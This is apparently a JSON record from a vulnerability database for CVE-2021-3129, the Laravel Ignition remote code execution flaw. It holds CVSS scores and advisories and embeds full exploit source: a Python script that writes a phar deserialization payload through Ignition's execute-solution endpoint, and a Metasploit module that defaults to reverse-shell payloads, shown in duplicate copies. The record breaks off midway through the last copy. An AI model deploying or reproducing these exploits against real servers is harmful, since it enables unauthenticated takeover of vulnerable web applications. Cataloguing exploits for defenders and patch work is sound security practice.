"HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-22T14:27:29", "type": "githubexploit", "title": "Exploit for Improper Authentication in Th-Wildau Covid-19 Contact Tracing", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33840", "CVE-2021-33831", "CVE-2021-3129"], "modified": "2021-09-01T08:02:36", "id": "7407E081-4DB0-50D7-AC00-42DC86BACF6D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-05-01T23:35:51", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-3129", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-01-21T00:00:00", "id": "AKB:5E9429E0-21B2-448F-8137-A7FDE1EA5C48", "href": "https://attackerkb.com/topics/KP6wETuZyw/cve-2021-3129", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2022-04-27T17:34:40", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T20:23:46", "type": "github", "title": "Unauthenticated remote code execution in Ignition", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-17T18:03:08", "id": "GHSA-4QWP-7C67-JMCC", "href": "https://github.com/advisories/GHSA-4qwp-7c67-jmcc", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-10-12T23:18:34", "description": "Ignition versions prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel versions prior to 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-07T00:00:00", "type": "zdt", "title": "Ignition 2.5.1 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-04-07T00:00:00", "id": "1337DAY-ID-36079", "href": "https://0day.today/exploit/description/36079", "sourceData": "# Exploit Title: Laravel debug mode Remote Code Execution (Ignition <= 2.5.1)\r\n# Exploit Author: Tobias Marcotto\r\n# Tested on: Kali Linux x64\r\n# Version: < 2.5.1\r\n# Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.\r\n# CVE : CVE-2021-3129\r\n\r\n\r\n*********************************************************************************************************\r\n\r\n\r\n#!/usr/bin/env python3.7\r\n\r\nimport base64\r\nimport re\r\nimport sys\r\nfrom dataclasses import dataclass\r\n\r\nimport requests\r\n\r\n\r\n@dataclass\r\nclass Exploit:\r\n session: requests.Session\r\n url: str\r\n payload: bytes\r\n log_path: str\r\n\r\n def main(self):\r\n if not self.log_path:\r\n self.log_path = self.get_log_path()\r\n \r\n try:\r\n self.clear_logs()\r\n self.put_payload()\r\n self.convert_to_phar()\r\n self.run_phar()\r\n finally:\r\n self.clear_logs()\r\n\r\n def success(self, message, *args):\r\n print('+ ' + message.format(*args))\r\n\r\n def failure(self, message, *args):\r\n print('- ' + message.format(*args))\r\n exit()\r\n\r\n def get_log_path(self):\r\n r = self.run_wrapper('DOESNOTEXIST')\r\n match = re.search(r'\"file\":\"(\\\\/[^\"]+?)\\\\/vendor\\\\/[^\"]+?\"', r.text)\r\n if not match:\r\n self.failure('Unable to find full path')\r\n path = match.group(1).replace('\\\\/', '/')\r\n path = f'{path}/storage/logs/laravel.log'\r\n r = self.run_wrapper(path)\r\n if r.status_code != 200:\r\n self.failure('Log file does not exist: {}', path)\r\n\r\n self.success('Log file: {}', path)\r\n return path\r\n \r\n def clear_logs(self):\r\n wrapper = f'php://filter/read=consumed/resource={self.log_path}'\r\n self.run_wrapper(wrapper)\r\n self.success('Logs cleared')\r\n return True\r\n\r\n def get_write_filter(self):\r\n filters = '|'.join((\r\n 'convert.quoted-printable-decode',\r\n 'convert.iconv.utf-16le.utf-8',\r\n 'convert.base64-decode'\r\n ))\r\n return f'php://filter/write={filters}/resource={self.log_path}'\r\n\r\n def run_wrapper(self, wrapper):\r\n solution = \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\"\r\n return self.session.post(\r\n self.url + '/_ignition/execute-solution/',\r\n json={\r\n \"solution\": solution,\r\n \"parameters\": {\r\n \"viewFile\": wrapper,\r\n \"variableName\": \"doesnotexist\"\r\n }\r\n }\r\n )\r\n\r\n def put_payload(self):\r\n payload = self.generate_payload()\r\n # This garanties the total log size is even\r\n self.run_wrapper(payload)\r\n self.run_wrapper('AA')\r\n\r\n def generate_payload(self):\r\n payload = self.payload\r\n payload = base64.b64encode(payload).decode().rstrip('=')\r\n payload = ''.join(c + '=00' for c in payload)\r\n # The payload gets displayed twice: use an additional '=00' so that\r\n # the second one does not have the same word alignment\r\n return 'A' * 100 + payload + '=00'\r\n\r\n def convert_to_phar(self):\r\n wrapper = self.get_write_filter()\r\n r = self.run_wrapper(wrapper)\r\n if r.status_code == 200:\r\n self.success('Successfully converted to PHAR !')\r\n else:\r\n self.failure('Convertion to PHAR failed (try again ?)')\r\n\r\n def run_phar(self):\r\n wrapper = f'phar://{self.log_path}/test.txt'\r\n r = self.run_wrapper(wrapper)\r\n if r.status_code != 500:\r\n self.failure('Deserialisation failed ?!!')\r\n self.success('Phar deserialized')\r\n # We might be able to read the output of system, but if we can't, it's ok\r\n match = re.search('^(.*?)\\n<!doctype html>\\n<html class=\"', r.text, flags=re.S)\r\n\r\n if match:\r\n print('--------------------------')\r\n print(match.group(1))\r\n print('--------------------------')\r\n elif 'phar error: write operations' in r.text:\r\n print('Exploit succeeded')\r\n else:\r\n print('Done')\r\n\r\n\r\ndef main(url, payload, log_path=None):\r\n payload = open(payload, 'rb').read()\r\n session = requests.Session()\r\n #session.proxies = {'http': 'localhost:8080'}\r\n exploit = Exploit(session, url.rstrip('/'), payload, log_path)\r\n exploit.main()\r\n\r\n\r\nif len(sys.argv) <= 1:\r\n print(\r\n f'Usage: {sys.argv[0]} <url> </path/to/exploit.phar> [log_file_path]\\n'\r\n '\\n'\r\n 'Generate your PHAR using PHPGGC, and add the --fast-destruct flag if '\r\n 'you want to see your command\\'s result. The Monolog/RCE1 GC works fine.\\n\\n'\r\n 'Example:\\n'\r\n ' $ php -d\\'phar.readonly=0\\' ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id\\n'\r\n ' $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar\\n'\r\n )\r\n exit()\r\n\r\nmain(sys.argv[1], sys.argv[2], (len(sys.argv) > 3 and sys.argv[3] or None))\n\n# 0day.today [2021-10-13] #", "sourceHref": "https://0day.today/exploit/36079", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-17T09:37:10", "description": "Ignition versions prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-17T00:00:00", "type": "zdt", "title": "Ignition Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-17T00:00:00", "id": "1337DAY-ID-37366", "href": "https://0day.today/exploit/description/37366", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Unauthenticated remote code execution in Ignition',\n 'Description' => %q{\n Ignition before 2.5.2, as used in Laravel and other products,\n allows unauthenticated remote attackers to execute arbitrary code\n because of insecure usage of file_get_contents() and file_put_contents().\n This is exploitable on sites using debug mode with Laravel before 8.4.2.\n },\n 'Author' => [\n 'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging\n 'ambionics' # discovered\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2021-3129'],\n ['URL', 'https://www.ambionics.io/blog/laravel-debug-rce']\n ],\n 'DisclosureDate' => '2021-01-13',\n 'Platform' => %w[unix linux macos win],\n 'Targets' => [\n [\n 'Unix (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ],\n [\n 'Windows (In-Memory)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }\n }\n ]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']),\n OptString.new('LOGFILE', [false, 'Laravel log file absolute path'])\n ])\n end\n\n def check\n print_status(\"Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'method' => 'PUT'\n }, 1)\n # Check whether it is using facade/ignition\n # If is using it should respond method not allowed\n # checking if debug mode is enable\n if res && res.code == 405 && res.body.match(/label:\"(Debug)\"/)\n vprint_status 'Debug mode is enabled.'\n # check version\n versions = JSON.parse(\n res.body.match(/.+\"report\":(\\{.*),\"exception_class/).captures.first.gsub(/$/, '}')\n )\n version = Rex::Version.new(versions['framework_version'])\n vprint_status \"Found PHP #{versions['language_version']} running Laravel #{version}\"\n # to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid)\n # but it is way more intrusive than just checking the version moreover we would need to call\n # the find_log_file method before, meaning four requests more.\n return Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1')\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n @logfile = datastore['LOGFILE'] || find_log_file\n fail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile\n\n clear_log\n put_payload\n convert_to_phar\n run_phar\n\n handler\n\n clear_log\n end\n\n def find_log_file\n vprint_status 'Trying to detect log file'\n res = post Rex::Text.rand_text_alpha_upper(12)\n if res.code == 500 && res.body.match(%r{\"file\":\"(\\\\/[^\"]+?)/vendor\\\\/[^\"]+?})\n logpath = Regexp.last_match(1).gsub(/\\\\/, '')\n vprint_status \"Found directory candidate #{logpath}\"\n logfile = \"#{logpath}/storage/logs/laravel.log\"\n vprint_status \"Checking if #{logfile} exists\"\n res = post logfile\n if res.code == 200\n vprint_status \"Found log file #{logfile}\"\n return logfile\n end\n vprint_error \"Log file does not exist #{logfile}\"\n return\n end\n vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually'\n return\n end\n\n def clear_log\n res = post \"php://filter/read=consumed/resource=#{@logfile}\"\n # guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true)\n fail_with(Failure::UnexpectedReply, \"Log file #{@logfile} doesn't seem to exist.\") unless res.code == 200\n end\n\n def put_payload\n post format_payload\n post Rex::Text.rand_text_alpha_upper(2)\n end\n\n def convert_to_phar\n filters = %w[\n convert.quoted-printable-decode\n convert.iconv.utf-16le.utf-8\n convert.base64-decode\n ].join('|')\n\n post \"php://filter/write=#{filters}/resource=#{@logfile}\"\n end\n\n def run_phar\n post \"phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt\"\n # resp.body.match(%r{^(.*)\\n<!doctype html>})\n # $1 ? print_good($1) : nil\n end\n\n def body_template(data)\n {\n solution: 'Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution',\n parameters: {\n viewFile: data,\n variableName: Rex::Text.rand_text_alpha_lower(4..12)\n }\n }.to_json\n end\n\n def post(data)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'method' => 'POST',\n 'data' => body_template(data),\n 'ctype' => 'application/json',\n 'headers' => {\n 'Accept' => '*/*',\n 'Accept-Encoding' => 'gzip, deflate'\n }\n })\n end\n\n def generate_phar(pop)\n file = Rex::Text.rand_text_alpha_lower(8)\n stub = \"<?php __HALT_COMPILER(); ?>\\r\\n\"\n file_contents = Rex::Text.rand_text_alpha_lower(20)\n file_crc32 = Zlib.crc32(file_contents) & 0xffffffff\n manifest_len = 40 + pop.length + file.length\n phar = stub\n phar << [manifest_len].pack('V') # length of manifest in bytes\n phar << [0x1].pack('V') # number of files in the phar\n phar << [0x11].pack('v') # api version of the phar manifest\n phar << [0x10000].pack('V') # global phar bitmapped flags\n phar << [0x0].pack('V') # length of phar alias\n phar << [pop.length].pack('V') # length of phar metadata\n phar << pop # pop chain\n phar << [file.length].pack('V') # length of filename in the archive\n phar << file # filename\n phar << [file_contents.length].pack('V') # length of the uncompressed file contents\n phar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970.\n phar << [file_contents.length].pack('V') # length of the compressed file contents\n phar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents\n phar << [0x1b6].pack('V') # bit-mapped file-specific flags\n phar << [0x0].pack('V') # serialized File Meta-data length\n phar << file_contents # serialized File Meta-data\n phar << [Rex::Text.sha1(phar)].pack('H*') # signature\n phar << [0x2].pack('V') # signiture type\n phar << 'GBMB' # signature presence\n\n return phar\n end\n\n def format_payload\n # rubocop:disable Style/StringLiterals\n serialize = \"a:2:{i:7;O:31:\\\"GuzzleHttp\\\\Cookie\\\\FileCookieJar\\\"\"\n serialize << \":1:{S:41:\\\"\\\\00GuzzleHttp\\\\5cCookie\\\\5cFileCookieJar\\\\00filename\\\";\"\n serialize << \"O:38:\\\"Illuminate\\\\Validation\\\\Rules\\\\RequiredIf\\\"\"\n serialize << \":1:{S:9:\\\"condition\\\";a:2:{i:0;O:20:\\\"PhpOption\\\\LazyOption\\\"\"\n serialize << \":2:{S:30:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00callback\\\";\"\n serialize << \"S:6:\\\"system\\\";S:31:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00arguments\\\";\"\n serialize << \"a:1:{i:0;S:#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}}i:1;S:3:\\\"get\\\";}}}i:7;i:7;}\"\n # rubocop:enable Style/StringLiterals\n phar = generate_phar(serialize)\n\n b64_gadget = Base64.strict_encode64(phar).gsub('=', '')\n payload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join\n\n return Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00'\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37366", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:02:18", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T15:15:00", "type": "cve", "title": "CVE-2021-3129", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-22T10:15:00", "cpe": [], "id": "CVE-2021-3129", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3129", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-04-06T14:45:06", "description": "", "cvss3": {}, "published": "2021-04-06T00:00:00", "type": "packetstorm", "title": "Ignition 2.5.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3129"], "modified": "2021-04-06T00:00:00", "id": "PACKETSTORM:162094", "href": "https://packetstormsecurity.com/files/162094/Ignition-2.5.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Laravel debug mode Remote Code Execution (Ignition <= 2.5.1) \n# Date: 05/04/2021 \n# Exploit Author: Tobias Marcotto \n# Tested on: Kali Linux x64 \n# Version: < 2.5.1 \n# Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. \n# CVE : CVE-2021-3129 \n \n \n********************************************************************************************************* \n \n \n#!/usr/bin/env python3.7 \n \nimport base64 \nimport re \nimport sys \nfrom dataclasses import dataclass \n \nimport requests \n \n \n@dataclass \nclass Exploit: \nsession: requests.Session \nurl: str \npayload: bytes \nlog_path: str \n \ndef main(self): \nif not self.log_path: \nself.log_path = self.get_log_path() \n \ntry: \nself.clear_logs() \nself.put_payload() \nself.convert_to_phar() \nself.run_phar() \nfinally: \nself.clear_logs() \n \ndef success(self, message, *args): \nprint('+ ' + message.format(*args)) \n \ndef failure(self, message, *args): \nprint('- ' + message.format(*args)) \nexit() \n \ndef get_log_path(self): \nr = self.run_wrapper('DOESNOTEXIST') \nmatch = re.search(r'\"file\":\"(\\\\/[^\"]+?)\\\\/vendor\\\\/[^\"]+?\"', r.text) \nif not match: \nself.failure('Unable to find full path') \npath = match.group(1).replace('\\\\/', '/') \npath = f'{path}/storage/logs/laravel.log' \nr = self.run_wrapper(path) \nif r.status_code != 200: \nself.failure('Log file does not exist: {}', path) \n \nself.success('Log file: {}', path) \nreturn path \n \ndef clear_logs(self): \nwrapper = f'php://filter/read=consumed/resource={self.log_path}' \nself.run_wrapper(wrapper) \nself.success('Logs cleared') \nreturn True \n \ndef get_write_filter(self): \nfilters = '|'.join(( \n'convert.quoted-printable-decode', \n'convert.iconv.utf-16le.utf-8', \n'convert.base64-decode' \n)) \nreturn f'php://filter/write={filters}/resource={self.log_path}' \n \ndef run_wrapper(self, wrapper): \nsolution = \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\" \nreturn self.session.post( \nself.url + '/_ignition/execute-solution/', \njson={ \n\"solution\": solution, \n\"parameters\": { \n\"viewFile\": wrapper, \n\"variableName\": \"doesnotexist\" \n} \n} \n) \n \ndef put_payload(self): \npayload = self.generate_payload() \n# This garanties the total log size is even \nself.run_wrapper(payload) \nself.run_wrapper('AA') \n \ndef generate_payload(self): \npayload = self.payload \npayload = base64.b64encode(payload).decode().rstrip('=') \npayload = ''.join(c + '=00' for c in payload) \n# The payload gets displayed twice: use an additional '=00' so that \n# the second one does not have the same word alignment \nreturn 'A' * 100 + payload + '=00' \n \ndef convert_to_phar(self): \nwrapper = self.get_write_filter() \nr = self.run_wrapper(wrapper) \nif r.status_code == 200: \nself.success('Successfully converted to PHAR !') \nelse: \nself.failure('Convertion to PHAR failed (try again ?)') \n \ndef run_phar(self): \nwrapper = f'phar://{self.log_path}/test.txt' \nr = self.run_wrapper(wrapper) \nif r.status_code != 500: \nself.failure('Deserialisation failed ?!!') \nself.success('Phar deserialized') \n# We might be able to read the output of system, but if we can't, it's ok \nmatch = re.search('^(.*?)\\n<!doctype html>\\n<html class=\"', r.text, flags=re.S) \n \nif match: \nprint('--------------------------') \nprint(match.group(1)) \nprint('--------------------------') \nelif 'phar error: write operations' in r.text: \nprint('Exploit succeeded') \nelse: \nprint('Done') \n \n \ndef main(url, payload, log_path=None): \npayload = open(payload, 'rb').read() \nsession = requests.Session() \n#session.proxies = {'http': 'localhost:8080'} \nexploit = Exploit(session, url.rstrip('/'), payload, log_path) \nexploit.main() \n \n \nif len(sys.argv) <= 1: \nprint( \nf'Usage: {sys.argv[0]} <url> </path/to/exploit.phar> [log_file_path]\\n' \n'\\n' \n'Generate your PHAR using PHPGGC, and add the --fast-destruct flag if ' \n'you want to see your command\\'s result. The Monolog/RCE1 GC works fine.\\n\\n' \n'Example:\\n' \n' $ php -d\\'phar.readonly=0\\' ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id\\n' \n' $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar\\n' \n) \nexit() \n \nmain(sys.argv[1], sys.argv[2], (len(sys.argv) > 3 and sys.argv[3] or None)) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162094/ignition251-exec.txt"}, {"lastseen": "2022-02-16T17:22:18", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-16T00:00:00", "type": "packetstorm", "title": "Ignition Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-16T00:00:00", "id": "PACKETSTORM:165999", "href": "https://packetstormsecurity.com/files/165999/Ignition-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Unauthenticated remote code execution in Ignition', \n'Description' => %q{ \nIgnition before 2.5.2, as used in Laravel and other products, \nallows unauthenticated remote attackers to execute arbitrary code \nbecause of insecure usage of file_get_contents() and file_put_contents(). \nThis is exploitable on sites using debug mode with Laravel before 8.4.2. \n}, \n'Author' => [ \n'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging \n'ambionics' # discovered \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2021-3129'], \n['URL', 'https://www.ambionics.io/blog/laravel-debug-rce'] \n], \n'DisclosureDate' => '2021-01-13', \n'Platform' => %w[unix linux macos win], \n'Targets' => [ \n[ \n'Unix (In-Memory)', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } \n} \n], \n[ \n'Windows (In-Memory)', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_CMD, \n'Type' => :win_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' } \n} \n] \n], \n'Privileged' => false, \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) 